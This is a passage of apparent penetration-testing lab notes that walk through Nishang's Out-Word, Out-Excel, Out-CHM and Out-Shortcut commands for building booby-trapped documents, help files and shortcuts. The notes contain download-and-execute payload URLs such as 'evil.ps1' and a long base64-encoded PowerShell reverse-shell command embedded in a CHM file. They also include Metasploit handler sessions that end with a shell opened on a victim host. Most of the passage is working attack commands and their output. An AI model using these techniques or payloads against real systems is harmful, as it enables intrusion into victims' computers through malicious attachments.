"content": "#### 46. Client Side Attacks Part 1\n\n###### Client Side Attacks\r\r- Malicious/Weaponized Attachments\n - Out-Word\n - Out-Excel\n \n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Import-Module .\\nishang.psm1\nWARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module\ncommand again with the Verbose parameter. For a list of approved verbs, type Get-Verb.\nWARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \\ $ ^ ; : \" ' < > | ? @ ` * % + = ~\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Help Out-Excel -Examples\n\nNAME\n Out-Excel\n\nSYNOPSIS\n Nishang Script which can generate and \"infect\" existing excel files with an auto executable macro.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n PS >Out-Excel -Payload \"powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process\" -RemainSafe\n\n\n Use above command to provide your own payload to be executed from macro. A file named \"Salary_Details.doc\" would be generated\n in the current directory.\n\n\n\n\n -------------------------- EXAMPLE 2 --------------------------\n\n PS >Out-Excel -PayloadScript C:\\nishang\\Shells\\Invoke-PowerShellTcpOneLine.ps1\n\n\n Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it,\n you must pass the parameters in the script itself. A file named \"Salary_Details.doc\" would be generated in the\n current directory with the script used as encoded payload.\n\n\n\n\n -------------------------- EXAMPLE 3 --------------------------\n\n PS >Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1\n\n\n Use above when you want to use the default payload, which is a powershell download and execute one-liner. A file\n named \"Salary_Details.doc\" would be generated in the current directory.\n\n\n\n\n -------------------------- EXAMPLE 4 --------------------------\n\n PS >Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -Arguments Evil\n\n\n Use above when you want to use the default payload, which is a powershell download and execute one-liner.\n The Arugment parameter allows to pass arguments to the downloaded script.\n\n\n\n\n -------------------------- EXAMPLE 5 --------------------------\n\n PS >Out-Excel -PayloadURL http://yourwebserver.com/Powerpreter.psm1 -Arguments \"Invoke-PsUACMe;Get-WLAN-Keys\"\n\n\n Use above for multiple payloads. The idea is to use a script or module as payload which loads multiple functions.\n\n\n\n\n -------------------------- EXAMPLE 6 --------------------------\n\n PS >Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -OutputFile C:\\docfiles\\Generated.doc\n\n\n In above, the output file would be saved to the given path.\n\n\n\n\n -------------------------- EXAMPLE 7 --------------------------\n\n PS >Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -ExcelFileDir C:\\docfiles\\\n\n\n In above, in the C:\\docfiles directory, macro enabled .doc files would be created for all the .docx files, with the same name\n and same Last MOdified Time.\n\n\n\n\n -------------------------- EXAMPLE 8 --------------------------\n\n PS >Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -ExcelFileDir C:\\docfiles\\ -Recurse\n\n\n The above command would search recursively for .docx files in C:\\docfiles.\n\n\n\n\n -------------------------- EXAMPLE 9 --------------------------\n\n PS >Out-Excel -PayloadURL http://yourwebserver.com/evil.ps1 -ExcelFileDir C:\\docfiles\\ -Recurse -RemoveDocx\n\n\n The above command would search recursively for .docx files in C:\\docfiles, generate macro enabled .doc files and\n delete the original files.\n\n\n\n\n -------------------------- EXAMPLE 10 --------------------------\n\n PS >Out-Excel -PayloadScript C:\\nishang\\Shells\\Invoke-PowerShellTcpOneLine.ps1 -RemainSafe\n\n\n Out-Excel turns off Macro Security. Use -RemainSafe to turn it back on.\n\n\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Out-Excel \"powershell.exe -noexit -c Get-Service\"\nSaved to file C:\\Users\\Administrator\\Desktop\\nishang-master\\Salary_Details.xls\n0\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> ls .\\Salary_Details.xls\n\n\n Directory: C:\\Users\\Administrator\\Desktop\\nishang-master\n\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\n-a--- 7/17/2017 1:30 PM 29184 Salary_Details.xls\n\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n![Image of Task Manager](images/16.jpeg)\n\nView → Macros → View Macros → Auto Open → Edit\n\n![Image of Task Manager](images/17.jpeg)\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Help Out-Word -Examples\n\nNAME\n Out-Word\n\nSYNOPSIS\n Nishang Script which can generate as well as \"infect\" existing word files with an auto executable macro.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n PS >Out-Word -Payload \"powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process\" -RemainSafe\n\n\n Use above command to provide your own payload to be executed from macro. A file named \"Salary_Details.doc\" would be generated\n in the current directory.\n\n\n\n\n -------------------------- EXAMPLE 2 --------------------------\n\n PS >Out-Word -PayloadScript C:\\nishang\\Shells\\Invoke-PowerShellTcpOneLine.ps1\n\n\n Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it,\n you must pass the parameters in the script itself. A file named \"Salary_Details.doc\" would be generated in the\n current directory with the script used as encoded payload.\n\n\n\n\n -------------------------- EXAMPLE 3 --------------------------\n\n PS >Out-Word -PayloadURL http://yourwebserver.com/evil.ps1\n\n\n Use above when you want to use the default payload, which is a powershell download and execute one-liner. A file\n named \"Salary_Details.doc\" would be generated in the current directory.\n\n\n\n\n -------------------------- EXAMPLE 4 --------------------------\n\n PS >Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -Arguments Evil\n\n\n Use above when you want to use the default payload, which is a powershell download and execute one-liner.\n The Arugment parameter allows to pass arguments to the downloaded script.\n\n\n\n\n -------------------------- EXAMPLE 5 --------------------------\n\n PS >Out-Word -PayloadURL http://yourwebserver.com/Powerpreter.psm1 -Arguments \"Invoke-PsUACMe;Get-WLAN-Keys\"\n\n\n Use above for multiple payloads. The idea is to use a script or module as payload which loads multiple functions.\n\n\n\n\n -------------------------- EXAMPLE 6 --------------------------\n\n PS >Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -OutputFile C:\\docfiles\\Generated.doc\n\n\n In above, the output file would be saved to the given path.\n\n\n\n\n -------------------------- EXAMPLE 7 --------------------------\n\n PS >Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\\docfiles\\\n\n\n In above, in the C:\\docfiles directory, macro enabled .doc files would be created for all the .docx files, with the same name\n and same Last MOdified Time.\n\n\n\n\n -------------------------- EXAMPLE 8 --------------------------\n\n PS >Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\\docfiles\\ -Recurse\n\n\n The above command would search recursively for .docx files in C:\\docfiles.\n\n\n\n\n -------------------------- EXAMPLE 9 --------------------------\n\n PS >Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:\\docfiles\\ -Recurse -RemoveDocx\n\n\n The above command would search recursively for .docx files in C:\\docfiles, generate macro enabled .doc files and\n delete the original files.\n\n\n\n\n -------------------------- EXAMPLE 10 --------------------------\n\n PS >Out-Word -PayloadScript C:\\nishang\\Shells\\Invoke-PowerShellTcpOneLine.ps1 -RemainSafe\n\n\n Out-Word turns off Macro Security. Use -RemainSafe to turn it back on.\n\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```" }, { "path": "47-Client-Side-Attacks-Part-2.md", "content": "#### 47. Client Side Attacks Part 2\n\n###### Malicious/Weaponized Attachments\n\n- Out-CHM\n- Out-Shortcut\n\n - Out-CHM\n\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Import-Module .\\nishang.psm1\n\tWARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module\n\tcommand again with the Verbose parameter. For a list of approved verbs, type Get-Verb.\n\tWARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \\ $ ^ ; : \" ' < > | ? @ ` * % + = ~\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Help Out-CHM -Examples\n\t\n\tNAME\n\t Out-CHM\n\t\n\tSYNOPSIS\n\t Nishang script useful for creating Compiled HTML Help file (.CHM) which could be used to run PowerShell commands and scripts.\n\t\n\t -------------------------- EXAMPLE 1 --------------------------\n\t\n\t PS >Out-CHM -Payload \"Get-Process\" -HHCPath \"C:\\Program Files (x86)\\HTML Help Workshop\"\n\t\n\t\n\t Above command would execute Get-Process on the target machine when the CHM file is opened.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 2 --------------------------\n\t\n\t PS >Out-CHM -PayloadScript C:\\nishang\\Shells\\Invoke-PowerShellTcpOneLine.ps1 -HHCPath \"C:\\Program Files (x86)\\HTML Help Workshop\"\n\t\n\t\n\t Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it,\n\t you must pass the parameters in the script itself.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 3 --------------------------\n\t\n\t PS >Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath \"C:\\Program Files (x86)\\HTML Help Workshop\"\n\t\n\t\n\t Use above command to generate CHM file which download and execute the given PowerShell script in memory on target.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 4 --------------------------\n\t\n\t PS >Out-CHM -Payload \"-EncodedCommand <>\" -HHCPath \"C:\\Program Files (x86)\\HTML Help Workshop\"\n\t\n\t\n\t Use above command to generate CHM file which executes the encoded command/script.\n\t Use Invoke-Encode from Nishang to encode the command or script.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 5 --------------------------\n\t\n\t PS >Out-CHM -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HHCPath \"C:\\Program Files (x86)\\HTML Help Workshop\"\n\t\n\t\n\t Use above command to pass an argument to the PowerShell script/module.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 6 --------------------------\n\t\n\t PS >Out-CHM -PayloadScript C:\\nishang\\Shells\\Invoke-PowerShellTcpOneLine.ps1\n\t\n\t\n\t Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it,\n\t you must pass the parameters in the script itself.\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Out-CHM -Payload \" -c Get-Process\" -HHCPath 'C:\\Program Files (x86)\\HTML Help Workshop'\n\tMicrosoft HTML Help Compiler 4.74.8702\n\t\n\tCompiling c:\\Users\\Administrator\\Desktop\\nishang-master\\doc.chm\n\t\n\t\n\tCompile time: 0 minutes, 0 seconds\n\t2 Topics\n\t4 Local links\n\t4 Internet links\n\t0 Graphics\n\t\n\t\n\tCreated c:\\Users\\Administrator\\Desktop\\nishang-master\\doc.chm, 13,430 bytes\n\tCompression increased file by 291 bytes.\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> ls .\\doc.chm\n\t\n\t\n\t Directory: C:\\Users\\Administrator\\Desktop\\nishang-master\n\t\n\t\n\tMode LastWriteTime Length Name\n\t---- ------------- ------ ----\n\t-a--- 7/17/2017 1:52 PM 13430 doc.chm\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t[```mini-reverse.ps1```](https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5)\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Invoke-Encode -DataToEncode ..\\mini-reverse.ps1 -OutCommand\n\tEncoded data written to .\\encoded.txt\n\tEncoded command written to .\\encodedcommand.txt\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> cat .\\encodedcommand.txt\n\tSQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALg\n\tBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAo\n\tACcAagBWAFgAZgBiADkAbwB3AEUASAA0AHUARQB2ACsARABGADAAVQBqADAAYwBDAEQAcQB0AHAATAB0AFEAZgBXADAAcQBuAFMAQgBGAFAAcAAxAEkAZABwAFUAawBOAHkAQQBXAC8ARwBwAHIAYQB6AFUAbgBYADgANwB6AHYALwBBAEEAbwBOAEYAWQBrAFUASgBjAD\n\tcAMwAzAFgAMQAzADUAegB2AEgAVwB1AFoALwB3AEoARABQAFIATQBCAGoAUgAwADUAKwBRADIANwBJACsARQBrAGIAbQBOAE0AaABHAEQAcAAyAHYAegBXADkAegBSAGMAWABuAEkARQB3AFMAYQB2AFgAcABmAFkAKwA3AFgANQBxAHQAYwBrAFoAWAB1AGwANQBzADgA\n\tSABLAEoAQQA2AG0ATwB2AEIAQQBZAGwARgB4AG4AagA3AEQAawBoAG4AUwBXAHoAVQBiAHMAVABZAEsAcwBqAG0ANgBDAFMAagA2AEYAYwB6AFkAcgBTAFcAVwBIAGoAOABxAFoAawBEAFYAeQByAGcAZQBVAFkAKwA4AGMANQBnAGsAMgBIAEsAMABTAFYAVwBXAEIAMg\n\tBoAGYAbgBnAHoAOAAvAEUAVgA2ADMAZABNAHoAaQB3AFMAUgB5ADQASwBKAGEAUwAzADIARgBwAGEARwA5AG4AWABPADIAQwBEAEEAawBGAEwASQBaAHUATwA1ADIAVABnAEoAMgB1AGcAVgByAC8AVABNAHEAVAAyAEoAVQBVAEIAaABnADcARgBoAGgAZwBXAE4AMwAx\n\tAEcARQA3ADQAOAB6AHgAbQBHAHQAawBsADUAbQBKAHUAdgAvAHoAUgBqAFAASgBoAHgASQBSAHkAcgBpAHkAZABzAHMARQBlAHQAawBhAHoATAB3AGIAdgBBAHoAQwBmAEcAMQBTAGIAZgB0AEEAawBrAFIAdQBiAEwAdQBaAEcAVgBMAHQAZwBrAHEAWgBCAFAAZgBkAG\n\tkAagBPAFoAbwBxAG0ARgBqAHoATABJAFkAbgB1ADEAYgAyAEkAMgBsAEgAMABjAHMAawB2ADIAQgBpAHcAaABPACsAcwBZAFEAbwBQAFYAYwBaADEARQB0AG4AcQBSAFcAbgBxADUAVwBWAHEANgBpAE8AMABVAEkAdAAxADAARwB0AFIAdwBIAEoAVQBKAGkAMwBTAFMA\n\tawBsAG4AaQBzAFgAdgBlAGYAeQBHADQARwBDADYAbQB1AGcAZwBiADUALwAxAG8AZQBlAGMAbgAyAHgAaQAyAHMAVgAzADIANgA4AFkAQQBXADgAbABXAEIAOQBVAEwAegBnAHoANwBnAC8AbABJAEsAWgBtADUAbwBRADQASABXAFQAdgBpAGgAZABNAGwAQgBLADkARA\n\tBIAEUATABqAEgAYQAyAHcAQwBYAEwAcABrAEoAcQB3ADMASgBOAHYAeQB1AFoAZwA5AFoAagBrAHkAbAB6AGoAWQBSAEQAaAB1AGcAVgBWAG4AcQBZAHoAYwBFAG0ASgBwADgAWABGAEoAWQBRAEgAUQBUAGYAUQBNAEUAVQBlAGsAUwB6AG8AcwBoAFUATQBWAEIASwAy\n\tAHEAMABiAEcAMQBYAEIAMABhAHgAUgBaAFIAWQArAFUAVwAvAFMAZgBtAGcAWQB6ADQARAB6AHcAUgBMAHkAeQBsAGkAQgBjAFkAbABGAFAAVQB6AG8AcQAyAGsAMQB4AC8ANQAyAFIAZgA2AFkAdQB6AG8AUQBsACsARABhAGkASQA3AE4AWQBSADIAWABiAGgASgByAF\n\toAVABuADMAaAAyAEYASgBTAHYANABSAEQATABvAHoAeABGADYAcABoAGQAMQBsAHoARgB4AEoATgBjAEQAZABtAHEAUQAxAEMARwAyAEsAcwBMAFcAYwB5AFIAZABaAGQARQAxADIASwB3AGUAaQBPAEUAUQBFAHAAWABhAEoAcgBtAGgAdgA4ADEAaABKAEUAbQBSAFkA\n\tUABSAGUAeQB3AEoANABYAFEATABxAHUAeQAvAGUAUgB6AG8AdQBmAEgATQBIAFoAYQA4AHkASwBBAEoAYgB0AEMARABiAEcAVwBNAE4AMgByAGUASwBmADEAbwA3AHYAegBmAFcANABTAHQANQBIAHQAcwB3AFIAaQBYAHkAaABiAGEAcgB4AHUAKwBOADcANwAzAHoATA\n\tBkAFkAOAB0AGYANAA5AGUAUQAxAHUAdABoADQAUgBGADIAZwBTAEUAQQAyAEcAcgBjAEQAMQBWADMAVgBEAC8AeABnAFEANABiAEUAagBuAHkAcwArADUAMQBaADAAZABwAGEAUgArAEwARwAwAE8ARABaAHAAegBxAGMARQBmAEkAKwBGAHcAZQBiAGsAUwB4AGoARABU\n\tAEMANwBmAFcAYgBQAHcASAAnACkAKQApACkALAAgAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALAAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG\n\t4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Out-CHM \" -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3\n\tAC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHY\n\tAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAagBWAFgAZgBiADkAbwB3AEUASAA0AHUARQB2ACsARABGADAAVQBqADAAYwBDAEQAcQB0AHAATAB0AFEAZgBXADAAcQBuAFMAQgBGAFAAcAAxAEkAZABwAFUAawBOAHkAQQBXAC8ARw\n\tBwAHIAYQB6AFUAbgBYADgANwB6AHYALwBBAEEAbwBOAEYAWQBrAFUASgBjADcAMwAzAFgAMQAzADUAegB2AEgAVwB1AFoALwB3AEoARABQAFIATQBCAGoAUgAwADUAKwBRADIANwBJACsARQBrAGIAbQBOAE0AaABHAEQAcAAyAHYAegBXADkAegBSAGMAWABuAEkARQB3A\n\tFMAYQB2AFgAcABmAFkAKwA3AFgANQBxAHQAYwBrAFoAWAB1AGwANQBzADgASABLAEoAQQA2AG0ATwB2AEIAQQBZAGwARgB4AG4AagA3AEQAawBoAG4AUwBXAHoAVQBiAHMAVABZAEsAcwBqAG0ANgBDAFMAagA2AEYAYwB6AFkAcgBTAFcAVwBIAGoAOABxAFoAawBEAFYA\n\teQByAGcAZQBVAFkAKwA4AGMANQBnAGsAMgBIAEsAMABTAFYAVwBXAEIAMgBoAGYAbgBnAHoAOAAvAEUAVgA2ADMAZABNAHoAaQB3AFMAUgB5ADQASwBKAGEAUwAzADIARgBwAGEARwA5AG4AWABPADIAQwBEAEEAawBGAEwASQBaAHUATwA1ADIAVABnAEoAMgB1AGcAVgB\n\tyAC8AVABNAHEAVAAyAEoAVQBVAEIAaABnADcARgBoAGgAZwBXAE4AMwAxAEcARQA3ADQAOAB6AHgAbQBHAHQAawBsADUAbQBKAHUAdgAvAHoAUgBqAFAASgBoAHgASQBSAHkAcgBpAHkAZABzAHMARQBlAHQAawBhAHoATAB3AGIAdgBBAHoAQwBmAEcAMQBTAGIAZgB0AE\n\tEAawBrAFIAdQBiAEwAdQBaAEcAVgBMAHQAZwBrAHEAWgBCAFAAZgBkAGkAagBPAFoAbwBxAG0ARgBqAHoATABJAFkAbgB1ADEAYgAyAEkAMgBsAEgAMABjAHMAawB2ADIAQgBpAHcAaABPACsAcwBZAFEAbwBQAFYAYwBaADEARQB0AG4AcQBSAFcAbgBxADUAVwBWAHEAN\n\tgBpAE8AMABVAEkAdAAxADAARwB0AFIAdwBIAEoAVQBKAGkAMwBTAFMAawBsAG4AaQBzAFgAdgBlAGYAeQBHADQARwBDADYAbQB1AGcAZwBiADUALwAxAG8AZQBlAGMAbgAyAHgAaQAyAHMAVgAzADIANgA4AFkAQQBXADgAbABXAEIAOQBVAEwAegBnAHoANwBnAC8AbABJ\n\tAEsAWgBtADUAbwBRADQASABXAFQAdgBpAGgAZABNAGwAQgBLADkARABIAEUATABqAEgAYQAyAHcAQwBYAEwAcABrAEoAcQB3ADMASgBOAHYAeQB1AFoAZwA5AFoAagBrAHkAbAB6AGoAWQBSAEQAaAB1AGcAVgBWAG4AcQBZAHoAYwBFAG0ASgBwADgAWABGAEoAWQBRAEg\n\tAUQBUAGYAUQBNAEUAVQBlAGsAUwB6AG8AcwBoAFUATQBWAEIASwAyAHEAMABiAEcAMQBYAEIAMABhAHgAUgBaAFIAWQArAFUAVwAvAFMAZgBtAGcAWQB6ADQARAB6AHcAUgBMAHkAeQBsAGkAQgBjAFkAbABGAFAAVQB6AG8AcQAyAGsAMQB4AC8ANQAyAFIAZgA2AFkAdQ\n\tB6AG8AUQBsACsARABhAGkASQA3AE4AWQBSADIAWABiAGgASgByAFoAVABuADMAaAAyAEYASgBTAHYANABSAEQATABvAHoAeABGADYAcABoAGQAMQBsAHoARgB4AEoATgBjAEQAZABtAHEAUQAxAEMARwAyAEsAcwBMAFcAYwB5AFIAZABaAGQARQAxADIASwB3AGUAaQBPA\n\tEUAUQBFAHAAWABhAEoAcgBtAGgAdgA4ADEAaABKAEUAbQBSAFkAUABSAGUAeQB3AEoANABYAFEATABxAHUAeQAvAGUAUgB6AG8AdQBmAEgATQBIAFoAYQA4AHkASwBBAEoAYgB0AEMARABiAEcAVwBNAE4AMgByAGUASwBmADEAbwA3AHYAegBmAFcANABTAHQANQBIAHQA\n\tcwB3AFIAaQBYAHkAaABiAGEAcgB4AHUAKwBOADcANwAzAHoATABkAFkAOAB0AGYANAA5AGUAUQAxAHUAdABoADQAUgBGADIAZwBTAEUAQQAyAEcAcgBjAEQAMQBWADMAVgBEAC8AeABnAFEANABiAEUAagBuAHkAcwArADUAMQBaADAAZABwAGEAUgArAEwARwAwAE8ARAB\n\taAHAAegBxAGMARQBmAEkAKwBGAHcAZQBiAGsAUwB4AGoARABUAEMANwBmAFcAYgBQAHcASAAnACkAKQApACkALAAgAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAH\n\tMAcwApACkALAAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA\" -HHCPath 'C:\\Program Files (x86)\\HTML Help Workshop'\n\tMicrosoft HTML Help Compiler 4.74.8702\n\t\n\tCompiling c:\\Users\\Administrator\\Desktop\\nishang-master\\doc.chm\n\t\n\t\n\tCompile time: 0 minutes, 0 seconds\n\t2 Topics\n\t4 Local links\n\t4 Internet links\n\t0 Graphics\n\t\n\t\n\tCreated c:\\Users\\Administrator\\Desktop\\nishang-master\\doc.chm, 14,994 bytes\n\tCompression decreased file by 1,230 bytes.\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\tRun ```doc.chm```\n\t\n\t```sh\n\troot@kali:~# msfconsole\n\tmsf > use exploit/multi/handler\n\tmsf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp\n\tPAYLOAD => windows/shell/reverse_tcp\n\tmsf exploit(handler) > set LHOST 10.0.0.206\n\tLHOST => 10.0.0.206\n\tmsf exploit(handler) > set LPORT 4444\n\tLPORT => 4444\n\tmsf exploit(handler) > show options\n\t\n\tModule options (exploit/multi/handler):\n\t\n\t Name Current Setting Required Description\n\t ---- --------------- -------- -----------\n\t\n\t\n\tPayload options (windows/shell/reverse_tcp):\n\t\n\t Name Current Setting Required Description\n\t ---- --------------- -------- -----------\n\t EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)\n\t LHOST 10.0.0.206 yes The listen address\n\t LPORT 4444 yes The listen port\n\t\n\t\n\tExploit target:\n\t\n\t Id Name\n\t -- ----\n\t 0 Wildcard Target\n\t\n\t\n\tmsf exploit(handler) > exploit\n\t\n\t[*] Started reverse TCP handler on 10.0.0.206:4444\n\t[*] Starting the payload handler...\n\t[*] Encoded stage with x86/shikata_ga_nai\n\t[*] Sending encoded stage (267 bytes) to 10.0.0.233\n\t[*] Command shell session 1 opened (10.0.0.206:4444 -> 10.0.0.233:51162) at 2017-07-17 17:13:28 -0400\n\t\n\twhoami\n\tpfpt\\administrator\n\t```\n\t\n\t- Out-Shortcut\n\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Help Out-Shortcut -Examples\n\t\n\tNAME\n\t Out-Shortcut\n\t\n\tSYNOPSIS\n\t Nishang script which creates a shortcut capable of launching PowerShell commands and scripts.\n\t\n\t -------------------------- EXAMPLE 1 --------------------------\n\t\n\t PS >Out-Shortcut -Payload \"-WindowStyle hidden -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem\"\n\t\n\t\n\t Above command would execute Get-ChildItem on the target machine when the shortcut is opened. Note that powershell.exe is\n\t not a part of the payload as the shortcut already points to it.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 2 --------------------------\n\t\n\t PS >Out-Shortcut -PayloadURL http://192.168.254.1/Get-Wlan-Keys.ps1\n\t\n\t\n\t Use above command to generate a Shortcut which download and execute the given powershell script in memory on target.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 3 --------------------------\n\t\n\t PS >Out-Shortcut -Payload \"-EncodedCommand <>\"\n\t\n\t\n\t Use above command to generate a Shortcut which executes the given encoded command/script.\n\t Use Invoke-Encode from Nishang to encode the command or script.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 4 --------------------------\n\t\n\t PS >Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM\n\t\n\t\n\t Use above command to pass an argument to the powershell script/module.\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 5 --------------------------\n\t\n\t PS >Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HotKey 'F3'\n\t\n\t\n\t Use above command to assign F3 as hotkey to the shortcut\n\t\n\t\n\t\n\t\n\t -------------------------- EXAMPLE 6 --------------------------\n\t\n\t PS >Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HotKey 'F3' -Icon 'notepad.exe'\n\t\n\t\n\t Use above command to assign notepad icon to the generated shortcut.\n\t\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Out-Shortcut -PayloadURL http://10.0.0.233:8000/mini-reverse.ps1\n\tThe Shortcut file has been written as C:\\Users\\Administrator\\Desktop\\nishang-master\\Shortcut to File Server.lnk\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> ls '.\\Shortcut to File Server.lnk'\n\t\n\t Directory: C:\\Users\\Administrator\\Desktop\\nishang-master\n\t\n\t\n\tMode LastWriteTime Length Name\n\t---- ------------- ------ ----\n\t-a--- 7/17/2017 3:21 PM 1544 Shortcut to File Server.lnk\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\tRun ```Shortcut to File Server.lnk```\n\t\n\t```sh\n\troot@kali:~# msfconsole\n\tmsf > use exploit/multi/handler\n\tmsf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp\n\tPAYLOAD => windows/shell/reverse_tcp\n\tmsf exploit(handler) > set LHOST 10.0.0.206\n\tLHOST => 10.0.0.206\n\tmsf exploit(handler) > set LPORT 4444\n\tLPORT => 4444\n\tmsf exploit(handler) > show options\n\t\n\tModule options (exploit/multi/handler):\n\t\n\t Name Current Setting Required Description\n\t ---- --------------- -------- -----------\n\t\n\t\n\tPayload options (windows/shell/reverse_tcp):\n\t\n\t Name Current Setting Required Description\n\t ---- --------------- -------- -----------\n\t EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, 